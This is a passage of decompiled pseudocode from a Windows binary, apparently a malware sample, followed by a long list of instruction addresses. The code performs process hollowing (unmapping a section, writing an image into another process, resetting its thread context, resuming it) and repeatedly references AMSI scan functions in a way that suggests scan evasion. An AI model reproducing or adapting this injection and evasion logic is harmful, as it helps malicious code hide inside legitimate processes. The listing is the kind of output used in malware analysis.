						E032B7C04(_v232,  *0x32de35c, _t1716, _t2004);
						0x32de3d8->ContextFlags = 0x10007;
						_push(0x32b9f4c);
						_push( *0x32de35c);
						_push("UacInitialize");
						E032A4824();
						E032A4698( &_v240, E032A4964(_v244));
						_push(_v240);
						E032A47B0( &_v252,  *0x32de35c, 0x32b9f4c);
						E032A4698( &_v248, E032A4964(_v252));
						_pop(_t1721);
						E032B7C04(_v248,  *0x32de35c, _t1721, _t2004);
						_push(0x32b9f4c);
						_push( *0x32de35c);
						_push("UacScan");
						E032A4824();
						E032A4698( &_v256, E032A4964(_v260));
						_push(_v256);
						E032A47B0( &_v268,  *0x32de35c, 0x32b9f4c);
						E032A4698( &_v264, E032A4964(_v268));
						_pop(_t1726);
						E032B7C04(_v264,  *0x32de35c, _t1726, _t2004);
						_push(0x32b9f4c);
						_push( *0x32de35c);
						_push("Initialize");
						E032A4824();
						E032A4698( &_v272, E032A4964(_v276));
						_push(_v272);
						E032A47B0( &_v284,  *0x32de35c, 0x32b9f4c);
						E032A4698( &_v280, E032A4964(_v284));
						_pop(_t1731);
						E032B7C04(_v280,  *0x32de35c, _t1731, _t2004);
						_push(0x32b9f4c);
						_push( *0x32de35c);
						_push("ScanString");
						E032A4824();
						E032A4698( &_v288, E032A4964(_v292));
						_push(_v288);
						E032A47B0( &_v300,  *0x32de35c, 0x32b9f4c);
						E032A4698( &_v296, E032A4964(_v300));
						_pop(_t1736);
						E032B7C04(_v296,  *0x32de35c, _t1736, _t2004);
						_t819 =  *0x32de388; // 0x0
						_t820 = GetThreadContext(_t819, 0x32de3d8);
						_t2005 = _t820;
						if(_t820 != 0) {
							_push(0x32b9f4c);
							_push( *0x32de35c);
							_push("UacInitialize");
							E032A4824();
							E032A4698( &_v304, E032A4964(_v308));
							_push(_v304);
							E032A47B0( &_v316,  *0x32de35c, 0x32b9f4c);
							E032A4698( &_v312, E032A4964(_v316));
							_pop(_t1741);
							E032B7C04(_v312,  *0x32de35c, _t1741, _t2005);
							_push(0x32b9f4c);
							_push( *0x32de35c);
							_push("UacScan");
							E032A4824();
							E032A4698( &_v320, E032A4964(_v324));
							_push(_v320);
							E032A47B0( &_v332,  *0x32de35c, 0x32b9f4c);
							E032A4698( &_v328, E032A4964(_v332));
							_pop(_t1746);
							E032B7C04(_v328,  *0x32de35c, _t1746, _t2005);
							_push(0x32b9f4c);
							_push( *0x32de35c);
							_push("Initialize");
							E032A4824();
							E032A4698( &_v336, E032A4964(_v340));
							_push(_v336);
							E032A47B0( &_v348,  *0x32de35c, 0x32b9f4c);
							E032A4698( &_v344, E032A4964(_v348));
							_pop(_t1751);
							E032B7C04(_v344,  *0x32de35c, _t1751, _t2005);
							_push(0x32b9f4c);
							_push( *0x32de35c);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v352, E032A4964(_v356));
							_push(_v352);
							E032A47B0( &_v364,  *0x32de35c, 0x32b9f4c);
							E032A4698( &_v360, E032A4964(_v364));
							_pop(_t1756);
							E032B7C04(_v360,  *0x32de35c, _t1756, _t2005);
							_t877 =  *0x32de47c; // 0x0
							_t879 =  *0x32de384; // 0x0
							NtReadVirtualMemory(_t879, _t877 + 8, 0x32de4ac, 4, 0x32de4b4);
							_t881 =  *0x32de4a8; // 0x0
							_t2006 =  *((intOrPtr*)(_t881 + 0x34)) -  *0x32de4ac; // 0x0
							if(_t2006 != 0) {
								_t883 =  *0x32de4c0; // 0x0
								_t884 =  *0x32de4a8; // 0x0
								_t886 =  *0x32de384; // 0x0
								 *0x32de4b0 = E032B79BC(_t886,  *((intOrPtr*)(_t884 + 0x34)), _t883, 0x3000, 0x40);
							} else {
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("UacInitialize");
								E032A4824();
								E032A4698( &_v368, E032A4964(_v372));
								_push(_v368);
								E032A47B0( &_v380,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v376, E032A4964(_v380));
								_pop(_t1969);
								E032B7C04(_v376,  *0x32de35c, _t1969, _t2006);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("UacScan");
								E032A4824();
								E032A4698( &_v384, E032A4964(_v388));
								_push(_v384);
								E032A47B0( &_v396,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v392, E032A4964(_v396));
								_pop(_t1974);
								E032B7C04(_v392,  *0x32de35c, _t1974, _t2006);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("Initialize");
								E032A4824();
								E032A4698( &_v400, E032A4964(_v404));
								_push(_v400);
								E032A47B0( &_v412,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v408, E032A4964(_v412));
								_pop(_t1979);
								E032B7C04(_v408,  *0x32de35c, _t1979, _t2006);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v416, E032A4964(_v420));
								_push(_v416);
								E032A47B0( &_v428,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v424, E032A4964(_v428));
								_pop(_t1984);
								E032B7C04(_v424,  *0x32de35c, _t1984, _t2006);
								_t1535 =  *0x32de4a8; // 0x0
								_t1537 =  *0x32de384; // 0x0
								if(NtUnmapViewOfSection(_t1537,  *(_t1535 + 0x34)) != 0) {
									_t1539 =  *0x32de4c0; // 0x0
									_t1540 =  *0x32de384; // 0x0
									 *0x32de4b0 = E032B79BC(_t1540, 0, _t1539, 0x3000, 0x40);
								} else {
									_t1542 =  *0x32de4c0; // 0x0
									_t1543 =  *0x32de384; // 0x0
									 *0x32de4b0 = E032B79BC(_t1543, 0, _t1542, 0x3000, 0x40);
								}
							}
							_t2008 =  *0x32de4b0;
							if( *0x32de4b0 != 0) {
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("UacInitialize");
								E032A4824();
								E032A4698( &_v432, E032A4964(_v436));
								_push(_v432);
								E032A47B0( &_v444,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v440, E032A4964(_v444));
								_pop(_t1761);
								E032B7C04(_v440,  *0x32de35c, _t1761, _t2008);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("UacScan");
								E032A4824();
								E032A4698( &_v448, E032A4964(_v452));
								_push(_v448);
								E032A47B0( &_v460,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v456, E032A4964(_v460));
								_pop(_t1766);
								E032B7C04(_v456,  *0x32de35c, _t1766, _t2008);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("Initialize");
								E032A4824();
								E032A4698( &_v464, E032A4964(_v468));
								_push(_v464);
								E032A47B0( &_v476,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v472, E032A4964(_v476));
								_pop(_t1771);
								E032B7C04(_v472,  *0x32de35c, _t1771, _t2008);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v480, E032A4964(_v484));
								_push(_v480);
								E032A47B0( &_v492,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v488, E032A4964(_v492));
								_pop(_t1776);
								E032B7C04(_v488,  *0x32de35c, _t1776, _t2008);
								_t1995 = E032B7E64(_t1994, _t2013);
								_t946 =  *0x32de4a8; // 0x0
								_t2009 =  *((intOrPtr*)(_t946 + 0x34)) -  *0x32de4b0; // 0x0
								if(_t2009 != 0) {
									_push(0x32b9f4c);
									_push( *0x32de35c);
									_push("UacInitialize");
									E032A4824();
									E032A4698( &_v496, E032A4964(_v500));
									_push(_v496);
									E032A47B0( &_v508,  *0x32de35c, 0x32b9f4c);
									E032A4698( &_v504, E032A4964(_v508));
									_pop(_t1914);
									E032B7C04(_v504,  *0x32de35c, _t1914, _t2009);
									_push(0x32b9f4c);
									_push( *0x32de35c);
									_push("UacScan");
									E032A4824();
									E032A4698( &_v512, E032A4964(_v516));
									_push(_v512);
									E032A47B0( &_v524,  *0x32de35c, 0x32b9f4c);
									E032A4698( &_v520, E032A4964(_v524));
									_pop(_t1919);
									E032B7C04(_v520,  *0x32de35c, _t1919, _t2009);
									_push(0x32b9f4c);
									_push( *0x32de35c);
									_push("Initialize");
									E032A4824();
									E032A4698( &_v528, E032A4964(_v532));
									_push(_v528);
									E032A47B0( &_v540,  *0x32de35c, 0x32b9f4c);
									E032A4698( &_v536, E032A4964(_v540));
									_pop(_t1924);
									E032B7C04(_v536,  *0x32de35c, _t1924, _t2009);
									_push(0x32b9f4c);
									_push( *0x32de35c);
									_push("ScanString");
									E032A4824();
									E032A4698( &_v544, E032A4964(_v548));
									_push(_v544);
									E032A47B0( &_v556,  *0x32de35c, 0x32b9f4c);
									E032A4698( &_v552, E032A4964(_v556));
									_pop(_t1929);
									E032B7C04(_v552,  *0x32de35c, _t1929, _t2009);
									_t1386 =  *0x32de4a8; // 0x0
									_t1930 =  *0x32de4b0; // 0x0
									_t1387 =  *0x32de4a8; // 0x0
									E032B7D5C(_t2013, _t1995, _t1387, _t1930 -  *((intOrPtr*)(_t1386 + 0x34)));
									_t1389 =  *0x32de4a8; // 0x0
									_t1932 =  *0x32de4b0; // 0x0
									 *(_t1389 + 0x34) = _t1932;
									_push(0x32b9f4c);
									_push( *0x32de35c);
									_push("UacInitialize");
									E032A4824();
									E032A4698( &_v560, E032A4964(_v564));
									_push(_v560);
									E032A47B0( &_v572,  *0x32de35c, 0x32b9f4c);
									E032A4698( &_v568, E032A4964(_v572));
									_pop(_t1937);
									E032B7C04(_v568,  *0x32de35c, _t1937, _t2009);
									_push(0x32b9f4c);
									_push( *0x32de35c);
									_push("OpenSession");
									E032A4824();
									E032A4698( &_v576, E032A4964(_v580));
									_push(_v576);
									E032A47B0( &_v588,  *0x32de35c, 0x32b9f4c);
									E032A4698( &_v584, E032A4964(_v588));
									_pop(_t1942);
									E032B7C04(_v584,  *0x32de35c, _t1942, _t2009);
									_push(0x32b9f4c);
									_push( *0x32de35c);
									_push("ScanBuffer");
									E032A4824();
									E032A4698( &_v592, E032A4964(_v596));
									_push(_v592);
									E032A47B0( &_v604,  *0x32de35c, 0x32b9f4c);
									E032A4698( &_v600, E032A4964(_v604));
									_pop(_t1947);
									E032B7C04(_v600,  *0x32de35c, _t1947, _t2009);
									_push(0);
									_push(_t1995);
									_t1433 =  *0x32de4a4; // 0x0
									asm("cdq");
									_t2010 =  *((intOrPtr*)(_t1433 + 0x3c)) + _v456;
									asm("adc edx, [esp+0x4]");
									_t1949 =  *0x32de4a8; // 0x0
									E032B7D50( *((intOrPtr*)(_t1433 + 0x3c)) + _v456, 0xf8, _t1949);
									_push(0x32b9f4c);
									_push( *0x32de35c);
									_push("ScanBuffer");
									E032A4824();
									E032A4698( &_v608, E032A4964(_v612));
									_push(_v608);
									E032A47B0( &_v620,  *0x32de35c, 0x32b9f4c);
									E032A4698( &_v616, E032A4964(_v620));
									_pop(_t1954);
									E032B7C04(_v616,  *0x32de35c, _t1954,  *((intOrPtr*)(_t1433 + 0x3c)) + _v456);
									_push(0x32b9f4c);
									_push( *0x32de35c);
									_push("UacInitialize");
									E032A4824();
									E032A4698( &_v624, E032A4964(_v628));
									_push(_v624);
									E032A47B0( &_v636,  *0x32de35c, 0x32b9f4c);
									E032A4698( &_v632, E032A4964(_v636));
									_pop(_t1959);
									E032B7C04(_v632,  *0x32de35c, _t1959,  *((intOrPtr*)(_t1433 + 0x3c)) + _v456);
									_push(0x32b9f4c);
									_push( *0x32de35c);
									_push("OpenSession");
									E032A4824();
									E032A4698( &_v640, E032A4964(_v644));
									_push(_v640);
									E032A47B0( &_v652,  *0x32de35c, 0x32b9f4c);
									E032A4698( &_v648, E032A4964(_v652));
									_pop(_t1964);
									E032B7C04(_v648,  *0x32de35c, _t1964,  *((intOrPtr*)(_t1433 + 0x3c)) + _v456);
								}
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v656, E032A4964(_v660));
								_push(_v656);
								E032A47B0( &_v668,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v664, E032A4964(_v668));
								_pop(_t1781);
								E032B7C04(_v664,  *0x32de35c, _t1781, _t2010);
								_t962 =  *0x32de4c0; // 0x0
								_t963 =  *0x32de4b0; // 0x0
								_t964 =  *0x32de384; // 0x0
								NtWriteVirtualMemory(_t964, _t963, _t1995, _t962, 0x32de4b4);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("UacInitialize");
								E032A4824();
								E032A4698( &_v672, E032A4964(_v676));
								_push(_v672);
								E032A47B0( &_v684,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v680, E032A4964(_v684));
								_pop(_t1786);
								E032B7C04(_v680,  *0x32de35c, _t1786, _t2010);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v688, E032A4964(_v692));
								_push(_v688);
								E032A47B0( &_v700,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v696, E032A4964(_v700));
								_pop(_t1791);
								E032B7C04(_v696,  *0x32de35c, _t1791, _t2010);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v704, E032A4964(_v708));
								_push(_v704);
								E032A47B0( &_v716,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v712, E032A4964(_v716));
								_pop(_t1796);
								E032B7C04(_v712,  *0x32de35c, _t1796, _t2010);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("UacInitialize");
								E032A4824();
								E032A4698( &_v720, E032A4964(_v724));
								_push(_v720);
								E032A47B0( &_v732,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v728, E032A4964(_v732));
								_pop(_t1801);
								E032B7C04(_v728,  *0x32de35c, _t1801, _t2010);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v736, E032A4964(_v740));
								_push(_v736);
								E032A47B0( &_v748,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v744, E032A4964(_v748));
								_pop(_t1806);
								E032B7C04(_v744,  *0x32de35c, _t1806, _t2010);
								_t1036 =  *0x32de47c; // 0x0
								_t1038 =  *0x32de384; // 0x0
								NtWriteVirtualMemory(_t1038, _t1036 + 8, 0x32de4b0, 4, 0x32de4b4);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("UacInitialize");
								E032A4824();
								E032A4698( &_v752, E032A4964(_v756));
								_push(_v752);
								E032A47B0( &_v764,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v760, E032A4964(_v764));
								_pop(_t1811);
								E032B7C04(_v760,  *0x32de35c, _t1811, _t2010);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v768, E032A4964(_v772));
								_push(_v768);
								E032A47B0( &_v780,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v776, E032A4964(_v780));
								_pop(_t1816);
								E032B7C04(_v776,  *0x32de35c, _t1816, _t2010);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v784, E032A4964(_v788));
								_push(_v784);
								E032A47B0( &_v796,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v792, E032A4964(_v796));
								_pop(_t1821);
								E032B7C04(_v792,  *0x32de35c, _t1821, _t2010);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("UacInitialize");
								E032A4824();
								E032A4698( &_v800, E032A4964(_v804));
								_push(_v800);
								E032A47B0( &_v812,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v808, E032A4964(_v812));
								_pop(_t1826);
								E032B7C04(_v808,  *0x32de35c, _t1826, _t2010);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v816, E032A4964(_v820));
								_push(_v816);
								E032A47B0( &_v828,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v824, E032A4964(_v828));
								_pop(_t1831);
								E032B7C04(_v824,  *0x32de35c, _t1831, _t2010);
								_t1110 =  *0x32de4a8; // 0x0
								_t1112 =  *((intOrPtr*)(_t1110 + 0x28)) +  *0x32de4b0;
								_t2011 = _t1112;
								 *0x32de488 = _t1112;
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("UacInitialize");
								E032A4824();
								E032A4698( &_v832, E032A4964(_v836));
								_push(_v832);
								E032A47B0( &_v844,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v840, E032A4964(_v844));
								_pop(_t1836);
								E032B7C04(_v840,  *0x32de35c, _t1836, _t1112);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("UacInitialize");
								E032A4824();
								E032A4698( &_v848, E032A4964(_v852));
								_push(_v848);
								E032A47B0( &_v860,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v856, E032A4964(_v860));
								_pop(_t1841);
								E032B7C04(_v856,  *0x32de35c, _t1841, _t1112);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v864, E032A4964(_v868));
								_push(_v864);
								E032A47B0( &_v876,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v872, E032A4964(_v876));
								_pop(_t1846);
								E032B7C04(_v872,  *0x32de35c, _t1846, _t1112);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v880, E032A4964(_v884));
								_push(_v880);
								E032A47B0( &_v892,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v888, E032A4964(_v892));
								_pop(_t1851);
								E032B7C04(_v888,  *0x32de35c, _t1851, _t2011);
								_t1169 =  *0x32de388; // 0x0
								SetThreadContext(_t1169, 0x32de3d8);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v896, E032A4964(_v900));
								_push(_v896);
								E032A47B0( &_v908,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v904, E032A4964(_v908));
								_pop(_t1856);
								E032B7C04(_v904,  *0x32de35c, _t1856, _t2011);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v912, E032A4964(_v916));
								_push(_v912);
								E032A47B0( &_v924,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v920, E032A4964(_v924));
								_pop(_t1861);
								E032B7C04(_v920,  *0x32de35c, _t1861, _t2011);
								_t1199 =  *0x32de388; // 0x0
								NtResumeThread(_t1199, 0);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v928, E032A4964(_v932));
								_push(_v928);
								E032A47B0( &_v940,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v936, E032A4964(_v940));
								_pop(_t1866);
								E032B7C04(_v936,  *0x32de35c, _t1866, _t2011);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v944, E032A4964(_v948));
								_push(_v944);
								E032A47B0( &_v956,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v952, E032A4964(_v956));
								_pop(_t1871);
								E032B7C04(_v952,  *0x32de35c, _t1871, _t2011);
								E032A2C2C(_t1995);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v960, E032A4964(_v964));
								_push(_v960);
								E032A47B0( &_v972,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v968, E032A4964(_v972));
								_pop(_t1877);
								E032B7C04(_v968,  *0x32de35c, _t1877, _t2011);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v976, E032A4964(_v980));
								_push(_v976);
								E032A47B0( &_v988,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v984, E032A4964(_v988));
								_pop(_t1882);
								E032B7C04(_v984,  *0x32de35c, _t1882, _t2011);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v992, E032A4964(_v996));
								_push(_v992);
								E032A47B0( &_v1004,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v1000, E032A4964(_v1004));
								_pop(_t1887);
								E032B7C04(_v1000,  *0x32de35c, _t1887, _t2011);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v1008, E032A4964(_v1012));
								_push(_v1008);
								E032A47B0( &_v1020,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v1016, E032A4964(_v1020));
								_pop(_t1892);
								E032B7C04(_v1016,  *0x32de35c, _t1892, _t2011);
								_t1288 =  *0x32de384; // 0x0
								E032B7B14(_t1288, "BCryptVerifySignature");
								_t1290 =  *0x32de384; // 0x0
								E032B7B14(_t1290, "BCryptQueryProviderRegistration");
								_t1292 =  *0x32de384; // 0x0
								E032B7B14(_t1292, "BCryptRegisterProvider");
								_t1294 =  *0x32de384; // 0x0
								E032B7B14(_t1294, "NtReadVirtualMemory");
								_t1296 =  *0x32de384; // 0x0
								E032B7B14(_t1296, "NtOpenObjectAuditAlarm");
								_t1298 =  *0x32de384; // 0x0
								E032B7B14(_t1298, "I_QueryTagInformation");
								_t1300 =  *0x32de384; // 0x0
								E032B7B14(_t1300, "NtSetSecurityObject");
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v1024, E032A4964(_v1028));
								_push(_v1024);
								E032A47B0( &_v1036,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v1032, E032A4964(_v1036));
								_pop(_t1904);
								E032B7C04(_v1032,  *0x32de35c, _t1904, _t2011);
								_push(0x32b9f4c);
								_push( *0x32de35c);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v1040, E032A4964(_v1044));
								_push(_v1040);
								E032A47B0( &_v1052,  *0x32de35c, 0x32b9f4c);
								E032A4698( &_v1048, E032A4964(_v1052));
								_pop(_t1909);
								E032B7C04(_v1048,  *0x32de35c, _t1909, _t2011);
							}
						}
					}
				}
				_pop(_t1661);
				 *[fs:eax] = _t1661;
				_push(0x32b9f2c);
				E032A44C4( &_v1052, 0x64);
				E032A44C4( &_v652, 0x64);
				E032A44C4( &_v252, 0x18);
				E032A4C24( &_v156);
				return E032A44C4( &_v152, 0x25);
			}

0x032b7f54
0x032b7f55
0x032b7f57
0x032b7f5c
0x032b7f5c
0x032b7f5e
0x032b7f60
0x032b7f60
0x032b7f60
0x032b7f66
0x032b7f68
0x032b7f6e
0x032b7f7a
0x032b7f7b
0x032b7f80
0x032b7f83
0x032b7f8d
0x032b7f92
0x032b7f97
0x032b7f99
0x032b7fa6
0x032b7fb8
0x032b7fc0
0x032b7fcb
0x032b7fdd
0x032b7fe5
0x032b7fe6
0x032b7feb
0x032b7ff0
0x032b7ff2
0x032b7fff
0x032b8011
0x032b8019
0x032b8024
0x032b8036
0x032b803e
0x032b803f
0x032b8044
0x032b8049
0x032b804b
0x032b8058
0x032b806a
0x032b8072
0x032b807d
0x032b808f
0x032b8097
0x032b8098
0x032b809d
0x032b80a2
0x032b80a4
0x032b80b1
0x032b80c3
0x032b80cb
0x032b80d6
0x032b80e8
0x032b80f0
0x032b80f1
0x032b80f8
0x032b80fe
0x032b8108
0x032b8112
0x032b8113
0x032b8114
0x032b811c
0x032b8120
0x032b8127
0x032b812c
0x032b8137
0x032b83f6
0x032b83fb
0x032b83fd
0x032b840d
0x032b8425
0x032b8430
0x032b843e
0x032b8456
0x032b8461
0x032b8462
0x032b8467
0x032b846c
0x032b846e
0x032b847e
0x032b8496
0x032b84a1
0x032b84af
0x032b84c7
0x032b84d2
0x032b84d3
0x032b84d8
0x032b84ee
0x032b84f3
0x032b84f8
0x032b8501
0x032b8507
0x032b850c
0x032b850e
0x032b851e
0x032b8536
0x032b8541
0x032b854f
0x032b8567
0x032b8572
0x032b8573
0x032b8578
0x032b857d
0x032b857f
0x032b858f
0x032b85a7
0x032b85b2
0x032b85c0
0x032b85d8
0x032b85e3
0x032b85e4
0x032b85e9
0x032b85f3
0x032b85f8
0x032b85fa
0x032b860a
0x032b8622
0x032b862d
0x032b863b
0x032b8653
0x032b865e
0x032b865f
0x032b8664
0x032b8669
0x032b866b
0x032b867b
0x032b8693
0x032b869e
0x032b86ac
0x032b86c4
0x032b86cf
0x032b86d0
0x032b86d5
0x032b86da
0x032b86dc
0x032b86ec
0x032b8704
0x032b870f
0x032b871d
0x032b8735
0x032b8740
0x032b8741
0x032b8746
0x032b874b
0x032b874d
0x032b875d
0x032b8775
0x032b8780
0x032b878e
0x032b87a6
0x032b87b1
0x032b87b2
0x032b87bc
0x032b87c2
0x032b87c7
0x032b87c9
0x032b87cf
0x032b87d4
0x032b87d6
0x032b87e6
0x032b87fe
0x032b8809
0x032b8817
0x032b882f
0x032b883a
0x032b883b
0x032b8840
0x032b8845
0x032b8847
0x032b8857
0x032b886f
0x032b887a
0x032b8888
0x032b88a0
0x032b88ab
0x032b88ac
0x032b88b1
0x032b88b6
0x032b88b8
0x032b88c8
0x032b88e0
0x032b88eb
0x032b88f9
0x032b8911
0x032b891c
0x032b891d
0x032b8922
0x032b8927
0x032b8929
0x032b8939
0x032b8951
0x032b895c
0x032b896a
0x032b8982
0x032b898d
0x032b898e
0x032b899f
0x032b89a8
0x032b89ae
0x032b89b3
0x032b89bb
0x032b89c1
0x032b8bec
0x032b8bf2
0x032b8bfb
0x032b8c06
0x032b89c7
0x032b89c7
0x032b89cc
0x032b89ce
0x032b89de
0x032b89f6
0x032b8a01
0x032b8a0f
0x032b8a27
0x032b8a32
0x032b8a33
0x032b8a38
0x032b8a3d
0x032b8a3f
0x032b8a4f
0x032b8a67
0x032b8a72
0x032b8a80
0x032b8a98
0x032b8aa3
0x032b8aa4
0x032b8aa9
0x032b8aae
0x032b8ab0
0x032b8ac0
0x032b8ad8
0x032b8ae3
0x032b8af1
0x032b8b09
0x032b8b14
0x032b8b15
0x032b8b1a
0x032b8b1f
0x032b8b21
0x032b8b31
0x032b8b49
0x032b8b54
0x032b8b62
0x032b8b7a
0x032b8b85
0x032b8b86
0x032b8b8b
0x032b8b94
0x032b8ba1
0x032b8bcb
0x032b8bd3
0x032b8bde
0x032b8ba3
0x032b8baa
0x032b8bb2
0x032b8bbd
0x032b8bbd
0x032b8ba1
0x032b8c0b
0x032b8c12
0x032b8c18
0x032b8c1d
0x032b8c1f
0x032b8c2f
0x032b8c47
0x032b8c52
0x032b8c60
0x032b8c78
0x032b8c83
0x032b8c84
0x032b8c89
0x032b8c8e
0x032b8c90
0x032b8ca0
0x032b8cb8
0x032b8cc3
0x032b8cd1
0x032b8ce9
0x032b8cf4
0x032b8cf5
0x032b8cfa
0x032b8cff
0x032b8d01
0x032b8d11
0x032b8d29
0x032b8d34
0x032b8d42
0x032b8d5a
0x032b8d65
0x032b8d66
0x032b8d6b
0x032b8d70
0x032b8d72
0x032b8d82
0x032b8d9a
0x032b8da5
0x032b8db3
0x032b8dcb
0x032b8dd6
0x032b8dd7
0x032b8de3
0x032b8de5
0x032b8ded
0x032b8df3
0x032b8df9
0x032b8dfe
0x032b8e00
0x032b8e10
0x032b8e28
0x032b8e33
0x032b8e41
0x032b8e59
0x032b8e64
0x032b8e65
0x032b8e6a
0x032b8e6f
0x032b8e71
0x032b8e81
0x032b8e99
0x032b8ea4
0x032b8eb2
0x032b8eca
0x032b8ed5
0x032b8ed6
0x032b8edb
0x032b8ee0
0x032b8ee2
0x032b8ef2
0x032b8f0a
0x032b8f15
0x032b8f23
0x032b8f3b
0x032b8f46
0x032b8f47
0x032b8f4c
0x032b8f51
0x032b8f53
0x032b8f63
0x032b8f7b
0x032b8f86
0x032b8f94
0x032b8fac
0x032b8fb7
0x032b8fb8
0x032b8fbd
0x032b8fc2
0x032b8fcc
0x032b8fd3
0x032b8fd8
0x032b8fdd
0x032b8fe3
0x032b8fe6
0x032b8feb
0x032b8fed
0x032b8ffd
0x032b9015
0x032b9020
0x032b902e
0x032b9046
0x032b9051
0x032b9052
0x032b9057
0x032b905c
0x032b905e
0x032b906e
0x032b9086
0x032b9091
0x032b909f
0x032b90b7
0x032b90c2
0x032b90c3
0x032b90c8
0x032b90cd
0x032b90cf
0x032b90df
0x032b90f7
0x032b9102
0x032b9110
0x032b9128
0x032b9133
0x032b9134
0x032b913d
0x032b913e
0x032b913f
0x032b9147
0x032b9148
0x032b914b
0x032b9157
0x032b915d
0x032b9162
0x032b9167
0x032b9169
0x032b9179
0x032b9191
0x032b919c
0x032b91aa
0x032b91c2
0x032b91cd
0x032b91ce
0x032b91d3
0x032b91d8
0x032b91da
0x032b91ea
0x032b9202
0x032b920d
0x032b921b
0x032b9233
0x032b923e
0x032b923f
0x032b9244
0x032b9249
0x032b924b
0x032b925b
0x032b9273
0x032b927e
0x032b928c
0x032b92a4
0x032b92af
0x032b92b0
0x032b92b0
0x032b92b5
0x032b92ba
0x032b92bc
0x032b92cc
0x032b92e4
0x032b92ef
0x032b92fd
0x032b9315
0x032b9320
0x032b9321
0x032b932b
0x032b9332
0x032b9338
0x032b933e
0x032b9343
0x032b9348
0x032b934a
0x032b935a
0x032b9372
0x032b937d
0x032b938b
0x032b93a3
0x032b93ae
0x032b93af
0x032b93b4
0x032b93b9
0x032b93bb
0x032b93cb
0x032b93e3
0x032b93ee
0x032b93fc
0x032b9414
0x032b941f
0x032b9420
0x032b9425
0x032b942a
0x032b942c
0x032b943c
0x032b9454
0x032b945f
0x032b946d
0x032b9485
0x032b9490
0x032b9491
0x032b9496
0x032b949b
0x032b949d
0x032b94ad
0x032b94c5
0x032b94d0
0x032b94de
0x032b94f6
0x032b9501
0x032b9502
0x032b9507
0x032b950c
0x032b950e
0x032b951e
0x032b9536
0x032b9541
0x032b954f
